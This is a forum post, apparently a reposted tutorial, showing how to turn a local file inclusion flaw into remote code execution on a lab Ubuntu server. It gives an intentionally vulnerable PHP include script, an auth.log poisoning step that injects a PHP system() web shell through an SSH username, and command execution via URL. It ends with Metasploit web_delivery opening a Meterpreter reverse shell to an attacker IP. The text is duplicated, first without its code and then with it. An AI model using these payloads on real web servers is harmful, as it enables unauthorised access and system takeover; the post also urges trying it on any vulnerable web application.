Ratonmeth123
Altcoin Hunter
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
In this article, you will learn how to make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in the configuration of own web server as well as more about LFI vulnerability.
Attacker: Kali Linux
Target: Ubuntu
Let’s Begin!!
Create a PHP file which will allow the user to include a file through a file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.
I had saved given below PHP code inside a text file as lfi.php and saved on the desktop.
Now login with the user as “root” and create a folder “lfi” inside /var/www/html
Move the lfi.php file from desktop to /var/www/html using given below command.
Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring the following URL to read password files:
From the given image you can observe that the above URL has dumped the following result shown below.
Open a terminal in your Kali Linux and connect the target through SSH service
From the screenshot, you can see I am connected with the target system.
Type following command to view its logs:
From given below image you can check the details of generated logs for the auth.log file.
Now I will try to open auth.log log file through lfi.php on the browser, therefore, give read and write permission to
Now to include the auth.log file as file parameter and give following URL inside the browser.
From the given image you can see it is showing created auth logs in the browser also.
Since the auth.log file generates a log for every success and failed login attempt when we try to connect with the web server. Taking advantage of this feature now I will send malicious PHP code as a fake user and it will get added automatically in the auth.log file as a new log.
Again when you will check its log, you will find the PHP code has been added a new log.
Type following command to view its logs:
Here it will dump the data of auth.log as well as execute command given through cmd; now execute ifconfig as cmd command to verify network interface and confirm its result from inside the given screenshot.
If you found such kind of vulnerability in any web application then you can use Metasploit platform to exploit web server.
Copy the highlighted text shown in below window
Paste the above copied malicious code inside URL as shown in the given image and execute it as a command.
When the above code gets executed you will get meterpreter session 1 of the targeted web server.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Attacker: Kali Linux
Target: Ubuntu
Let’s Begin!!
Create a PHP file which will allow the user to include a file through a file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.
Code:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
I had saved given below PHP code inside a text file as lfi.php and saved on the desktop.
data:image/s3,"s3://crabby-images/a18a1/a18a1d9739b112663e53d9f69374daf7f2b4ed95" alt="1.1.png"
Now login with the user as “root” and create a folder “lfi” inside /var/www/html
Code:
cd /var/www/html
mkdir lfi
Move the lfi.php file from desktop to /var/www/html using given below command.
Code:
mv /home/raj/Desktop/lfi.php .
data:image/s3,"s3://crabby-images/260a2/260a28355ffb3baedd5e5523e06ae6ffae1162f4" alt="1.2.png"
Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring the following URL to read password files:
Code:
localhost/lfi/lfi.php?file=/etc/passwd
From the given image you can observe that the above URL has dumped the following result shown below.
data:image/s3,"s3://crabby-images/6a901/6a90198e3def696704d3c69165450ef66178a1fd" alt="1.3.png"
Open a terminal in your Kali Linux and connect the target through SSH service
Code:
From the screenshot, you can see I am connected with the target system.
data:image/s3,"s3://crabby-images/3bf30/3bf30754f2f586537b123c8ed77cccf6284722ff" alt="1.png"
Type following command to view its logs:
Code:
tail -f /var/log/auth.log
From given below image you can check the details of generated logs for the auth.log file.
data:image/s3,"s3://crabby-images/4cbc6/4cbc6557bd25a204c14b123d87840f386c510e06" alt="2.png"
Now I will try to open auth.log log file through lfi.php on the browser, therefore, give read and write permission to
Code:
cd /var/log/
chmod 775 auth.log
data:image/s3,"s3://crabby-images/ae994/ae994dacda47f9a2f19d3bea5da7cb42f312fcdd" alt="3.png"
Now to include the auth.log file as file parameter and give following URL inside the browser.
Code:
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
From the given image you can see it is showing created auth logs in the browser also.
data:image/s3,"s3://crabby-images/20ef4/20ef4a1186fc661ed49c41f7e829f80e14be30e0" alt="4.png"
Since the auth.log file generates a log for every success and failed login attempt when we try to connect with the web server. Taking advantage of this feature now I will send malicious PHP code as a fake user and it will get added automatically in the auth.log file as a new log.
Code:
ssh '<?php system($_GET['c']); ?>'@192.168.1.129
data:image/s3,"s3://crabby-images/cc60a/cc60aa2f3610b241309eb61883f2b9b223a78660" alt="5.png"
Again when you will check its log, you will find the PHP code has been added a new log.
Type following command to view its logs:
Code:
tail -f /var/log/auth.log
data:image/s3,"s3://crabby-images/b1afd/b1afd37ec9618023089cb832c3ddb93a20e7c3e6" alt="6.png"
Here it will dump the data of auth.log as well as execute command given through cmd; now execute ifconfig as cmd command to verify network interface and confirm its result from inside the given screenshot.
Code:
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
data:image/s3,"s3://crabby-images/b54e2/b54e2df08222d6057ef2c24415941e9e424e7058" alt="7.png"
If you found such kind of vulnerability in any web application then you can use Metasploit platform to exploit web server.
Code:
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
data:image/s3,"s3://crabby-images/4d8c2/4d8c2718be809aa90b25d7c3c4880a5ff605a9d3" alt="8.png"
Paste the above copied malicious code inside URL as shown in the given image and execute it as a command.
data:image/s3,"s3://crabby-images/a278b/a278bda113b22c5e3a18bdd17a96f43cf98769fa" alt="9.png"
When the above code gets executed you will get meterpreter session 1 of the targeted web server.
Code:
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
data:image/s3,"s3://crabby-images/d8731/d8731bd5b3d138c5b7e073dff885f9474ae856f9" alt="10.png"
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here